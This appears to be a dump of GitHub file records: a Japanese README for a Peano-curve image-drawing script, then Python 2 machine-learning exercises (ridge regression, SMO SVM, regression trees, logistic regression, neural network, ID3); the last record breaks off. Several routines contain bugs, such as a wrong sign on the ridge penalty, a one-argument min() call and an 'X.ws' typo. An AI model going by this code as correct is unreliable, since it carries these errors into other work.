"tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "# ペアノ曲線による一筆書き\n\n## 理論的背景\n\nペアノ曲線とは、平面を充填する曲線の一種である。\n詳しくはWikipediaの[該当ページ](https://ja.wikipedia.org/wiki/%E3%83%9A%E3%82%A2%E3%83%8E%E6%9B%B2%E7%B7%9A)\nを読んでいただければわかるであろう。\n\nさて、ペアノ曲線は手で描ける曲線の極限として定義される。\nこのような抽象的な議論に慣れていない方もいるかもしれないが、\n現代数学においてこのような構成法に出会ったとき、\n多くの場合「この手法によって任意の精度が実現できる」\nというように読み替えられることが多い。\n\n例えば、点列の極限についてこう読み替えれば、通常のN-δ論法になる。\n\nただしこの読み替えは必ずしも簡単ではない。\n実際、ペアノ曲線の主張を正確にこう読み替えるのは難しい。\nこの難しさの理由は、ペアノ曲線の定義が、\n「空間は大きさのない点の集合として成り立っている」という点集合論\nに依拠しており、\n実はこれがそんなに理解のしやすいものではないということによると思われる。\n\n点から空間を構成する古代ギリシャ以来の方法は「逆立ちしたやり方」であり、\nむしろ点は「だんだん小さくなる領域の極限」として解釈すべきものなのではないか、\nという見方は、例えば中世スコラ哲学においてもみられる。\n\n現代数学において「pointless topology」などのジャンルでは、\n点を基礎概念としない幾何が追求されている。\n\nしかしペアノ曲線の非数学者でも扱いやすい読み替えを考えるのに、\nそのような最先端の数学が必要となっては本末転倒だ。\n\nそこで多少情報が落ちてもいい読み替えを探るように方針を転換する。\nそうすれば、ペアノ曲線の構成法は、\n「この手法によって、任意の長さ以上の一筆書きを正方形内部に収めることができる」\nと読み替えることが可能なのだ。\n\n点集合としての曲線や平面では、どこまで行っても曲線で埋められた平面の面積は0で、\n極限において初めて0ではなくなってしまう。\nしかし、現実世界の曲線においては、これは正方形の中にしめる黒の面積の割合がどんどん\n大きくなっていることになる。\n\nつまりペアノ曲線の理論を応用すれば、一筆書きによって任意の濃さのピクセルを表現することができるのだ。\n\n今回は、これを応用して、任意の画像を一筆書きによって描く簡単なスクリプトを書いてみた。\n\n## 仕組み\n\nまず画像がカラーなら白黒にし、\nそのピクセルの濃さを8段階に量子化する。\n\nその濃さに合わせて、ペアノ曲線の構成法で線を描き、\nピクセル同士を繋いでいく。\n\nコード自体は簡単なので、読めばわかると思う。\n\nこれは相当に単純な方法で行なっているので、\n工夫すればもっといい方法が見つかるかもしれない。\n\n## 動作例\n\nサンプル画像のジョゼッぺ・ペアノの肖像(パブリックドメイン)\n\n<img src=\"https://raw.githubusercontent.com/tannakaken/peanocurvestroke/master/Giuseppe_Peano.jpg\" width=\"500\">\n\nを、このスクリプトの入力にすると、\n\n`python main.py Gioseppe_Peano.jpg`\n\n次の画像が生まれる。\n\n<img src=\"https://raw.githubusercontent.com/tannakaken/peanocurvestroke/master/Giuseppe_Peano_peanocurved.sample.png\" width=\"500\">\n\n一筆書きになっている様子は上の画像をクリックして拡大してみればわかるであろう。\n\nただし、作りが雑なために、正方形にリサイズしてから処理を行っているため、\nアスペクト比が狂って少し横長になっている。\n\nまあ、こんな処理で汎用ツールを作るのも馬鹿らしいので、\n気になるようなら、前処理をするなり、コードを書き直すなりしてほしい。\n" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 24, "blob_id": "cefa7a9dff3c243c7b5336a1bcd65189f361d498", "content_id": "3fb1bc9e12a65a0da06e5c2a47e98abbeb3b89a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25, "license_type": "permissive", "max_line_length": 24, "num_lines": 1, "path": "/peano/__init__.py", "repo_name": "tannakaken/peanocurvestroke", "src_encoding": "UTF-8", "text": "from peano.main import *\n" } ]
6
pthaike/mlia
https://github.com/pthaike/mlia
4635a41daa42ab5ffc34eee88a4598521c891153
0e59ffd485eb207e8f04c4c0d03ded022f586909
e6bf00ea995684579601d9b95f4522798491d919
refs/heads/master
2021-01-10T04:46:03.820140
2017-07-18T14:49:27
2017-07-18T14:49:27
46,259,213
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6398147940635681, "alphanum_fraction": 0.6537036895751953, "avg_line_length": 23, "blob_id": "9edad5ded55341560f10e247050c1712d3aa13af", "content_id": "ece471c299449deb5465b6338482259827e0de92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 57, "num_lines": 45, "path": "/regression/ridgeReg.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\nfrom numpy import *\n\ndef loadDataSet(fileName):\n\tnumFeat = len(open(fileName).readline().split('\\t')) - 1\n\tdataMat = []; labelMat = []\n\tfr = open(fileName)\n\tfor line in fr.readlines():\n\t\tlineArr =[]\n\t\tcurLine = line.strip().split('\\t')\n\t\tfor i in range(numFeat):\n\t\t\tlineArr.append(float(curLine[i]))\n\t\tdataMat.append(lineArr)\n\t\tlabelMat.append(float(curLine[-1]))\n\treturn dataMat,labelMat\n\n\n\ndef ridgeRegres(xMat, yMat, lamda=0.2):\n\tdemon = xMat.T * xMat - lamda * eye(shape(xMat)[1])\n\tif linalg.det(demon) == 0.0:\n\t\tprint \"This matrix is singular, cannot do inverse\"\n\t\treturn\n\tw = demon.I * xMat.T * yMat\n\treturn w\n\ndef testRidge(xArr, yArr):\n\txMat = mat(xArr)\n\tyMat = mat(yArr).T\n\tymean = mean(yMat, 0)\n\tyMat = yMat - ymean\n\txMean = mean(xMat, 0)\n\txVar = var(xMat, 0)\n\txMat = (xMat - xMean) / xVar\n\tnumTest = 30\n\twMat = zeros((numTest, shape(xMean)[1]))\n\tfor i in range(numTest):\n\t\tw = ridgeRegres(xMat, yMat, exp(i-10))\n\t\twMat[i,:] = w.T\n\treturn wMat\n\n\nif __name__ == '__main__':\n\tdataMat,labelMat = loadDataSet('abalone.txt')\n\tprint testRidge(dataMat,labelMat )\n" }, { "alpha_fraction": 0.5140025615692139, "alphanum_fraction": 0.5312365293502808, "avg_line_length": 23.17708396911621, "blob_id": "3880cdef58e171d97dbbbf2b4523b038fe56ba1c", "content_id": "7d5bc6a2bb6026a28e7efd4bd88f769d8e5eaac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2321, "license_type": "no_license", "max_line_length": 125, "num_lines": 96, "path": "/svm/svm_simple.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#! 
/bin/python\n\nfrom numpy import *\n\n\"\"\"\nload dataSet\n\"\"\"\ndef loadDataSet():\n\tfr = open(\"testSet.txt\")\n\tx = []\n\ty = []\n\tfor line in fr.readlines():\n\t\tls = line.split(\"\\t\")\n\t\tx.append([float(ls[0]), float(ls[1])])\n\t\ty.append(float(ls[2]))\n\treturn x, y\n\n\ndef selectJrand(i, m):\n\tj = i\n\twhile j==i:\n\t\tj = random.uniform(0,m)\n\treturn j\n\n\"\"\"\nselect alpha between L and H\n\"\"\"\ndef clipAlpha(aj, H, L):\n\tif aj > H:\n\t\taj = H\n\tif aj < L:\n\t\taj = L\n\treturn aj\n\n\ndef kernel(x, xi):\n\treturn x * xi.T\n\n\ndef smoSimple(x, y, C, toler, maxIter):\n\tx = mat(x)\n\ty = mat(y).transpose()\n\tb = 0\n\tm,n = shape(x)\n\talphas = mat(zeros((m,1)))\n\titer = 0\n\twhile iter < maxIter:\n\t\talphaChange = 0\n\t\tfor i in range(m):\n\t\t\tf_xi = float(multiply(alphas, y).T * kernel(x, x[i,:])) + b\n\t\t\tEi = f_xi - float(y[i])\n\t\t\tif y[i] * f_xi < toler and alphas[i] < C or\\\n\t\t\ty[i] * f_xi > toler and alphas[i] > 0:\n\t\t\t\tj = selectJrand(i, m)\n\t\t\t\tf_xj = float(multiply(alphas, y).T * kernel(x, x[j,:])) + b\n\t\t\t\tEj = f_xj - y[j]\n\t\t\t\talpha_i_old = alphas[i].copy()\n\t\t\t\talpha_j_old = alphas[j].copy()\n\t\t\t\tif y[i] == y[j]:\n\t\t\t\t\tL = max(0, alpha_i_old+ alpha_j_old - C)\n\t\t\t\t\tH = min(C, alpha_i_old + alpha_j_old)\n\t\t\t\telse:\n\t\t\t\t\tL = max(0, alpha_j_old - alpha_i_old)\n\t\t\t\t\tH = min(C + alpha_j_old - alpha_i_old)\n\t\t\t\tif L==H:\n\t\t\t\t\tprint \"L==H\"\n\t\t\t\t\tcontinue\n\t\t\t\teta = kernel(x[i], x[i]) + kernel(x[j], x[j]) - 2 * kernel(x[i], x[j])\n\t\t\t\talphas[j] += y[i] * (Ei - Ej)\n\t\t\t\talphas[j] = clipAlpha(alphas[j], H, L)\n\t\t\t\tif alphas[j] - alpha_j_old < 0.00001:\n\t\t\t\t\tprint \"j not moving enough\"\n\t\t\t\t\tcontinue\n\t\t\t\talphas[i] = alpha_i_old + y[i] * y[j] * (alpha_j_old - alphas[j])\n\t\t\t\tb1 = b - Ei - y[i] * kernel(x[i], x[i]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[i])*(alphas[j] - alpha_j_old)\n\t\t\t\tb2 = b - Ej - y[i] * kernel(x[i], x[j]) * (alphas[i] - alpha_i_old) - y[j] * kernel(x[j], x[j])*(alphas[j] - alpha_j_old)\n\t\t\t\tif alphas[i] > 0 and alphas[i] < C:\n\t\t\t\t\tb = b1\n\t\t\t\telif alphas[j] > 0 and alphas[j] < C:\n\t\t\t\t\tb = b2\n\t\t\t\telse:\n\t\t\t\t\tb = (b1 + b2) / 2.0\n\t\t\t\talphaChange += 1\n\t\t\t\tprint \"iter: %d i:%d, pairs changed %d\" % (iter, i, alphaChange)\n\t\tif alphaChange == 0:\n\t\t\titer += 1\n\t\telse:\n\t\t\titer = 0\n\t\tprint \"iteration number: %d\" % iter\n\treturn alphas, b\n\nif __name__ == '__main__':\n\tx,y = loadDataSet()\n\talphas, b = smoSimple(x,y,0.6,0.001,40)\n\t# print alphas\n\tprint b\n" }, { "alpha_fraction": 0.6340078115463257, "alphanum_fraction": 0.6514021754264832, "avg_line_length": 27.593908309936523, "blob_id": "4655756f4fac14f391771f07f3671802edf81e38", "content_id": "ad3be2a7df6de38cc159ee8814f0f05fa80ec55c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5634, "license_type": "no_license", "max_line_length": 101, "num_lines": 197, "path": "/tree regression/regTree.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\n\nfrom numpy import *\nimport pdb\n\ndef loadDataSet(file):\n\tdataMat = []\n\tfr = open(file)\n\tfor line in fr.readlines():\n\t\tcurline = line.strip().split(\"\\t\")\n\t\tfloatline = map(float, curline)\n\t\tdataMat.append(floatline)\n\treturn dataMat\n\ndef binSplitDataSet(dataSet, feature, value):\n\tmat0 = dataSet[nonzero(dataSet[:, feature] > value)[0], :][0]\n\tmat1 
= dataSet[nonzero(dataSet[:, feature] <= value)[0], :][0]\n\treturn mat0, mat1\n\ndef regLeaf(dataSet):\n\treturn mean(dataSet[:, -1])\n\ndef regErr(dataSet):\n\treturn var(dataSet[:, -1]) * shape(dataSet)[0]\n\ndef createTree(dataSet, leafType= regLeaf, errType=regErr, ops=(1,4)):\n\tfeature, val = chooseBestSplit(dataSet, leafType, errType, ops)\n\tif feature == None:\n\t\treturn val\n\tretTree = {}\n\tretTree[\"feat\"] = feature\n\tretTree[\"val\"] = val\n\tleft, right = binSplitDataSet(dataSet, feature, val)\n\tretTree[\"left\"] = createTree(left, leafType, errType, ops)\n\tretTree[\"right\"] = createTree(right, leafType, errType, ops)\n\treturn retTree\n\n\n\n\n\"\"\"\nops(a, b)-- a:limit the minimal error b:limit the number of leaf\n\"\"\"\ndef chooseBestSplit(dataSet, leafType=regLeaf, errType=regErr, ops=(1,4)):\n\tif len(set(dataSet[:, -1].T.tolist()[0])) == 1: # when there is a only one entry\n\t\treturn None, leafType(dataSet)\n\tm,n = shape(dataSet)\n\tErr = regErr(dataSet)\n\tbestFeat = 0\n\tbestVal = 0\n\tbestE = inf\n\tfor feat in range(n-1):\n\t\tfor val in set(dataSet[:, feat]):\n\t\t\tmat0, mat1 = binSplitDataSet(dataSet, feat, val)\n\t\t\tif(shape(mat0)[0] < ops[1] or shape(mat1)[0] < ops[1]): # limit the number of leaf\n\t\t\t\tcontinue\n\t\t\tnewE = regErr(mat0) + regErr(mat1)\n\t\t\tif newE < bestE:\n\t\t\t\tbestE = newE\n\t\t\t\tbestFeat = feat\n\t\t\t\tbestVal = val\n\tif Err - bestE < ops[0]:\n\t\treturn None, leafType(dataSet)\n\tmat0, mat1 = binSplitDataSet(dataSet, bestFeat, bestVal)\n\tif(shape(mat0)[0] < ops[1] or shape(mat1)[0] < ops[1]): # limit the number of leaf\n\t\treturn None, leafType(dataSet)\n\treturn bestFeat, bestVal\n\ndef isTree(obj):\n\treturn (type(obj).__name__ == 'dict')\n\n\ndef getMean(tree):\n\tif isTree(tree['right']) : tree['right'] = getMean(tree['right'])\n\tif isTree(tree['left']) : tree['left'] = getMean(tree['left'])\n\treturn (tree['left'] + tree['right']) / 2.0\n\n\"\"\"\nSME to verify the cost of no merge and merge\n\"\"\"\n\ndef prune(tree, testData):\n\tif shape(testData)[0] == 0: return getMean(tree)\n\tif isTree(tree['left']) or isTree(tree['right']):\n\t\tleft, right = binSplitDataSet(testData, tree['feat'], tree['val'])\n\tif isTree(tree['left']):\n\t\ttree['left'] = prune(tree['left'], left)\n\tif isTree(tree['right']):\n\t\ttree['right'] = prune(tree['right'], right)\n\tif not isTree(tree['left']) and not isTree(tree['right']):\n\t\tleft, right = binSplitDataSet(testData, tree['feat'], tree['val'])\n\t\terrBefore = sum(power(left[:, -1] - tree['left'], 2)) + sum(power(right[:, -1] - tree['right'], 2))\n\t\ttreeMean = tree['left'] + tree['right']\n\t\terrMerge = sum(power(testData[:, -1] - treeMean, 2))\n\t\tif errMerge < errBefore:\n\t\t\tprint \"merged\"\n\t\t\treturn treeMean\n\t\telse:\n\t\t\treturn tree\n\telse:\n\t\treturn tree\n\n\n\"\"\"\nmodel tree \n\"\"\"\ndef linearSolve(dataSet):\n\tm, n = shape(dataSet)\n\tX = mat(ones((m,n))); Y = mat(ones((m,1)))\n\tX[:, 1:n] = mat(dataSet[:, 0:n-1])\n\tY = dataSet[:, -1]\n\txtx = X.T * X\n\tif linalg.det(xtx) == 0.0:\n\t\traise NameError('This matrix is singular, cannot do inverse,\\n\\\n\t\ttry increasing the second value of ops')\n\tws = xtx.I * (X.T * Y)\n\t# pdb.set_trace()\n\treturn ws, X, Y\n\n\n\n# def linearSolve(dataSet): #helper function used in two places\n# m,n = shape(dataSet)\n# X = mat(ones((m,n))); Y = mat(ones((m,1)))#create a copy of data with 1 in 0th postion\n# X[:,1:n] = dataSet[:,0:n-1]; Y = dataSet[:,-1]#and strip out Y\n# xTx = X.T*X\n# if 
linalg.det(xTx) == 0.0:\n# raise NameError('This matrix is singular, cannot do inverse,\\n\\\n# try increasing the second value of ops')\n# ws = xTx.I * (X.T * Y)\n# pdb.set_trace()\n# return ws,X,Y\n\n\ndef modelLeaf(dataSet):\n\tws, X, Y = linearSolve(dataSet)\n\treturn ws\n\ndef modelErr(dataSet):\n\tws, X, Y = linearSolve(dataSet)\n\treturn sum(power(X.ws - Y, 2))\n\n\ndef regTreeVal(model, data):\n\treturn float(model)\n\ndef modelTreeVal(model, data):\n\tn = shape(data)[1]\n\tx = mat(ones((1, n+1)))\n\tx[:, 1:n+1] = data\n\t# pdb.set_trace()\n\treturn float(x * model)\n\ndef treeForecast(tree, data, modelEval = regTreeVal):\n\tif not isTree(tree): return modelEval(tree, data)\n\tif data[tree['feat']] > tree['val']:\n\t\treturn treeForecast(tree['left'], data, modelEval)\n\telse:\n\t\treturn treeForecast(tree['right'], data, modelEval)\n\ndef createForecast(tree, testData, modelEval = regTreeVal):\n\tm = len(testData)\n\tpre = zeros((m, 1))\n\t# pdb.set_trace()\n\tfor i in range(m):\n\t\tpre[i,0] = treeForecast(tree, mat(testData[i]), modelEval)\n\treturn pre\n\n\nif __name__ == '__main__':\n\t# dataSet = loadDataSet('ex2.txt')\n\t# dataSet = mat(dataSet)\n\t# tree = createTree(dataSet, ops=(0,1))\n\t# print tree\n\t# testData = loadDataSet('ex2test.txt')\n\t# testData = mat(testData)\n\t# prunetree = prune(tree, testData)\n\t# print prunetree\n\n\t# dataSet = loadDataSet('exp2.txt')\n\t# dataSet = mat(dataSet)\n\t# tree = createTree(dataSet, modelLeaf, linearErr, ops=(1,10))\n\t# print tree\n\n\ttrainSet = loadDataSet('bikeSpeedVsIq_train.txt')\n\ttrainSet = mat(trainSet)\n\ttestSet = loadDataSet('bikeSpeedVsIq_train.txt')\n\ttestSet = mat(testSet)\n\ttree = createTree(trainSet, ops=(1,20))\n\tpre = createForecast(tree, testSet[:,0])\n\t# print pre\n\tprint \"tree:\", corrcoef(pre, testSet[:,1],rowvar=0)[0,1]\n\n\ttree = createTree(trainSet, modelLeaf, modelErr, ops=(1,20))\n\tpre = createForecast(tree, testSet[:,0], modelTreeVal)\n\t# print pre\n\tprint \"model tree\", corrcoef(pre, testSet[:,1],rowvar=0)[0,1]\n\n" }, { "alpha_fraction": 0.5876598954200745, "alphanum_fraction": 0.6102332472801208, "avg_line_length": 19.461538314819336, "blob_id": "a6ef66465514846edae1f82d8c23b171e7c01781", "content_id": "2e3d55c12bec4dd7429c236f09965b11ef60de4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 79, "num_lines": 65, "path": "/logistic/logRegres.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#! 
/bin/python\n\nfrom numpy import *\n\ndef sigmoid(x):\n\treturn 1.0/(1+exp(-x))\n\n\n\"\"\"\nupdate function w = w + alpha * grad = w + alpha * (y - sigmoid(wx))*x\n\"\"\"\ndef gradAscent(x, y):\n\tm, n = shape(x)\n\talpha = 0.001\n\tmaxCycles = 500\n\tw = ones((n,1))\n\tfor i in range(maxCycles):\n\t\tw = w + alpha * x.transpose()*(y - sigmoid(x*w))\n\treturn w\n\n\n\"\"\"\nupdate weight with a single instance\n\"\"\"\ndef stocGradAscent0(x, y):\n\tm, n = shape(x)\n\talpha = 0.01\n\tw = ones(n)\n\tfor i in range(m):\n\t\tw = w + alpha * (y[i] - sigmoid(sum(x[i]*w))) * x[i]\n\treturn w\n\n\"\"\"\nimprove with a random sample order and a decaying learning rate alpha\n\"\"\"\ndef stocGradAscent(x, y, numIter = 150):\n\tm,n = shape(x)\n\tw = ones(n)\n\tfor i in range(numIter):\n\t\tdataIndex = range(m)\n\t\tfor j in range(m):\n\t\t\t# the step size shrinks as training goes on, but never reaches 0\n\t\t\talpha = 4 / (1.0 + j + i) + 0.01\n\t\t\t# pick an instance at random, without replacement within a pass\n\t\t\trandIndex = int(random.uniform(0, len(dataIndex)))\n\t\t\tchosen = dataIndex[randIndex]\n\t\t\tw = w + alpha * (y[chosen] - sigmoid(sum(x[chosen]*w))) * x[chosen]\n\t\t\tdel(dataIndex[randIndex])\n\treturn w\n\n\n\n# load data\ndef loadDataSet():\n\tdataMat = []\n\tlabelMat = []\n\tfr = open(\"testSet.txt\")\n\tfor line in fr.readlines():\n\t\tls = line.strip().split(\"\\t\")\n\t\tdataMat.append([1.0, float(ls[0]), float(ls[1])])\n\t\tlabelMat.append(int(ls[2]))\n\treturn dataMat, labelMat\n\n\nif __name__ == '__main__':\n\tdat, label = loadDataSet()\n\t#print gradAscent(dat, label)\n\tprint stocGradAscent(array(dat), label)" }, { "alpha_fraction": 0.6610057353973389, "alphanum_fraction": 0.676885724067688, "avg_line_length": 29.233333587646484, "blob_id": "31036f6384ab5e89f5842cb6ce897ac04566e195", "content_id": "8bd1c1deff856b596f624c7250858e5e5a6a4981", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4534, "license_type": "no_license", "max_line_length": 162, "num_lines": 150, "path": "/nn/nn.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "# !/bin/python\n\nimport random\nfrom numpy import *\nimport math\nimport pdb\n\n\nclass NeuronNetwork:\n\tdef __init__(self, num_inputs, num_hidden, num_outputs, rate = 0.5,\n\t\thidden_layer_weights = None, hidden_layer_bias = None,\n\t\toutput_layer_weights = None, output_layer_bias = None):\n\n\t\tself.num_inputs = num_inputs\n\t\tself.rate = rate\n\t\tself.hidden_layer = NueronLayer(num_hidden, hidden_layer_bias)\n\t\tself.output_layer = NueronLayer(num_outputs, output_layer_bias)\n\n\t\tself.init_input_to_hidden_weight(hidden_layer_weights)\n\t\tself.init_hidden_to_output_weight(output_layer_weights)\n\n\n\tdef init_input_to_hidden_weight(self, hidden_layer_weights):\n\t\t# pdb.set_trace()\n\t\twix = 0\n\t\tfor i in range(len(self.hidden_layer.neurons)):\n\t\t\tfor j in range(self.num_inputs):\n\t\t\t\tif hidden_layer_weights:\n\t\t\t\t\tself.hidden_layer.neurons[i].weight.append(hidden_layer_weights[wix])\n\t\t\t\telse:\n\t\t\t\t\tself.hidden_layer.neurons[i].weight.append(random.random())\n\t\t\t\twix += 1\n\n\n\tdef init_hidden_to_output_weight(self, output_layer_weights):\n\t\twix = 0\n\t\tfor i in range(len(self.output_layer.neurons)):\n\t\t\tfor j in range(len(self.hidden_layer.neurons)):\n\t\t\t\tif output_layer_weights:\n\t\t\t\t\tself.output_layer.neurons[i].weight.append(output_layer_weights[wix])\n\t\t\t\telse:\n\t\t\t\t\tself.output_layer.neurons[i].weight.append(random.random())\n\t\t\t\twix += 1\n\n\n\tdef feed_forward(self, inputs):\n\t\thidden_layer_output = self.hidden_layer.feed_forward(inputs)\n\t\treturn self.output_layer.feed_forward(hidden_layer_output)\n\n\n\tdef train(self, training_inputs, training_outputs):\n\t\tself.feed_forward(training_inputs)\n\n\t\t# output delta\n\t\toutput_delta = [0] * len(self.output_layer.neurons)\n\t\tfor i in range(len(output_delta)):\n\t\t\toutput_delta[i] = self.output_layer.neurons[i].cal_delta(training_outputs[i])\n\n\t\t# hidden layer delta: w * delta * f'(z)\n\t\thidden_delta = [0] * len(self.hidden_layer.neurons)\n\t\tfor i in range(len(hidden_delta)):\n\t\t\tw_p_delta = 0\n\t\t\tfor j in range(len(self.output_layer.neurons)):\n\t\t\t\tw_p_delta += output_delta[j] * self.output_layer.neurons[j].weight[i]\n\t\t\thidden_delta[i] = w_p_delta * self.hidden_layer.neurons[i].cal_derivative()\n\n\t\t# update weight\n\t\t# update output layer weight\n\t\tfor i in range(len(self.output_layer.neurons)):\n\t\t\tfor j in range(len(self.output_layer.neurons[i].weight)):\n\t\t\t\tself.output_layer.neurons[i].weight[j] -= self.rate * output_delta[i] * self.output_layer.neurons[i].inputs[j]\n\n\t\t\t# update the bias once per neuron, after its weights\n\t\t\tself.output_layer.neurons[i].bias -= self.rate * output_delta[i]\n\n\t\t# update hidden layer weight\n\t\tfor i in range(len(self.hidden_layer.neurons)):\n\t\t\tfor j in range(len(self.hidden_layer.neurons[i].weight)):\n\t\t\t\tself.hidden_layer.neurons[i].weight[j] -= self.rate * hidden_delta[i] * self.hidden_layer.neurons[i].inputs[j]\n\n\t\t\t# update the bias once per neuron, after its weights\n\t\t\tself.hidden_layer.neurons[i].bias -= self.rate * hidden_delta[i]\n\n\n\tdef total_error(self, train):\n\t\terr = 0\n\t\tfor t in range(len(train)):\n\t\t\tinputs, outputs = train[t]\n\t\t\tself.feed_forward(inputs)\n\t\t\tfor i in range(len(outputs)):\n\t\t\t\terr += self.output_layer.neurons[i].cal_error(outputs[i])\n\t\treturn err\n\n\n# layer of neuron network\nclass NueronLayer:\n\tdef __init__(self, num_neurons, bias):\n\t\tself.bias = bias if bias else random.random()\n\t\tself.neurons = []\n\t\tfor i in range(num_neurons):\n\t\t\tself.neurons.append(Neuron(self.bias))\n\n\tdef feed_forward(self, x):\n\t\tself.outputs = []\n\t\tfor n in self.neurons:\n\t\t\tself.outputs.append(n.cal_output(x))\n\t\treturn self.outputs\n\n\nclass Neuron:\n\tdef __init__ (self, bias):\n\t\tself.bias = bias\n\t\tself.weight = []\n\n\tdef cal_input(self, x):\n\t\ty = 0\n\t\t# print len(x), len(self.weight)\n\t\tfor i in range(len(x)):\n\t\t\ty += self.weight[i] * x[i]\n\t\treturn y + self.bias\n\n\n\tdef cal_output(self, x):\n\t\tself.inputs = x\n\t\tself.output = self.squash(self.cal_input(x))\n\t\treturn self.output\n\t\n\tdef squash(self, total_input):\n\t\treturn 1 / (1 + math.exp(-total_input))\n\n\t# Mean Square Error\n\tdef cal_error(self, target):\n\t\treturn 0.5 * (self.output - target) ** 2\n\n\t# for Mean Square Error, the delta of the output is dE/dz = (y - t)\n\tdef cal_delta(self, target):\n\t\treturn self.output - target\n\n\n\t# for the sigmoid function, the derivative is f'(x) = f(x) * (1 - f(x))\n\tdef cal_derivative(self):\n\t\treturn self.output * (1 - self.output)\n\n\n\nif __name__ == '__main__':\n\tnn = NeuronNetwork(2,2,2,hidden_layer_weights=[0.15, 0.2, 0.25, 0.3], hidden_layer_bias=0.35, output_layer_weights=[0.4, 0.45, 0.5, 0.55], output_layer_bias=0.6)\n\tfor i in range(100):\n\t\tnn.train([0.05, 0.1], [0.01, 0.99])\n\t\tprint(i, round(nn.total_error([[[0.05, 0.1], [0.01, 0.99]]]), 9))" }, { "alpha_fraction": 0.6756656765937805, "alphanum_fraction": 0.6897189617156982, "avg_line_length": 23.151784896850586, "blob_id": "6bf286d6aef572b0e657cd671c53bf9f1806d51a", "content_id": "fa05f7a59d4c33bef60f12d1bd462784bd51971c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2704, "license_type": "no_license", "max_line_length": 70, "num_lines": 112, "path": "/id3/tree.py", "repo_name": "pthaike/mlia", "src_encoding": "UTF-8", "text": "#!/bin/python\n\nfrom math import log\nimport operator\nimport pdb\n\n\n# calculate the entropy\ndef calcShannonEnt(dataSet):\n\tnumEnt = len(dataSet)\n\tlabelCount = {}\n\tfor featvec in dataSet:\n\t\tlabel = featvec[-1]\n\t\tif label not in labelCount.keys():\n\t\t\tlabelCount[label] = 0\n\t\tlabelCount[label] += 1\n\tshannonEnt = 0.0\n\tfor key in labelCount:\n\t\tp = float(labelCount[key]) / numEnt\n\t\tshannonEnt = shannonEnt - p * log(p,2)\n\treturn shannonEnt\n\n\ndef splitDataSet(dataSet, axis, value):\n\tretDataSet=[]\n\tfor vec in dataSet:\n\t\tif vec[axis] == value:\n\t\t\treducedFeatVec = vec[:axis]\n\t\t\treducedFeatVec.extend(vec[axis+1:])\n\t\t\tretDataSet.append(reducedFeatVec)\n\treturn retDataSet\n\n#choose the best feature to split the dataset\ndef chooseBestFeature(dataSet):\n\tnumFeature = len(dataSet[0]) - 1\n\tbestFeature = -1\n\toriEnt = calcShannonEnt(dataSet)\n\tnumdat = len(dataSet)\n\tbestEnt = 0.0\n\tfor i in range(numFeature):\n\t\tallvalue = [vec[i] for vec in dataSet]\n\t\tuniqueVals = set(allvalue)\n\t\thGain = 0.0\n\t\tfor val in uniqueVals:\n\t\t\tsplitdat = splitDataSet(dataSet, i, val)\n\t\t\tent = calcShannonEnt(splitdat)\n\t\t\tprob = float(len(splitdat)) / numdat\n\t\t\thGain += prob * ent\n\t\tcurEntgain = oriEnt - hGain\n\t\tif curEntgain > bestEnt:\n\t\t\tbestEnt = curEntgain\n\t\t\tbestFeature = i\n\treturn bestFeature, bestEnt\n\n#get the class label that has the most entries\ndef majorityClass(classList):\n\tcls = {}\n\tfor c in classList:\n\t\tif c not in cls:\n\t\t\tcls[c] = 0\n\t\tcls[c] += 1\n\t# sort the (label, count) pairs by count, descending\n\tsortedcls = sorted(cls.items(), key = operator.itemgetter(1), reverse = True)\n\treturn sortedcls[0][0]\n\n#build tree by dataSet and attrs\ndef createTree(dataSet, attrs):\n\tlabels = [vec[-1] for vec in dataSet]\n\tif len(labels) == labels.count(labels[0]):\n\t\treturn labels[0]\n\tif len(dataSet[0]) == 1:\n\t\treturn majorityClass(labels)\n\tbestFeat,_ = chooseBestFeature(dataSet)\n\tvalues = [vec[bestFeat] for vec in dataSet]\n\tuniqueVals = set(values)\n\tbestFeatLabel = attrs[bestFeat]\n\ttree = {bestFeatLabel:{}}\n\tfor val in uniqueVals:\n\t\tsubattr = attrs[:bestFeat]\n\t\tsubattr.extend(attrs[bestFeat+1:])\n\t\tsubDat = splitDataSet(dataSet, bestFeat, val)\n\t\ttree[bestFeatLabel][val] = createTree(subDat, subattr)\n\treturn tree\n\ndef classify(tree, attrs, x):\n\tfirstStr = tree.keys()[0]\n\tdic = tree[firstStr]\n\tfeatIndex = attrs.index(firstStr)\n\tnext = dic[x[featIndex]]\n\tif type(next).__name__ == 'dict':\n\t\tclassLabel = classify(next, attrs, x)\n\telse:\n\t\tclassLabel = next\n\treturn classLabel\n\n\ndef createDataSet():\n\tdataSet = [\n\t[1,1,'yes'],\n\t[1,1,'yes'],\n\t[1,0,'no'],\n\t[0,1,'no'],\n\t[0,1,'no']\n\t]\n\tattrs = ['no surfacing', 'flippers']\n\treturn dataSet, attrs\n\nif __name__ == '__main__':\n\tdataSet, attrs = createDataSet()\n\ttree = createTree(dataSet, attrs)\n\tprint tree\n\tprint classify(tree, attrs, [1,0])" }, { "alpha_fraction": 0.7181274890899658, "alphanum_fraction": 0.730079710483551, "avg_line_length": 28.558822631835938, "blob_id": "d382bff2e6aea78819f553f6c5a6991bca283bea", "content_id": "c3ea1ea640c29ddd80931e883d4dca3c2c7f57e0", "detected_licenses": [], "is_generated": 
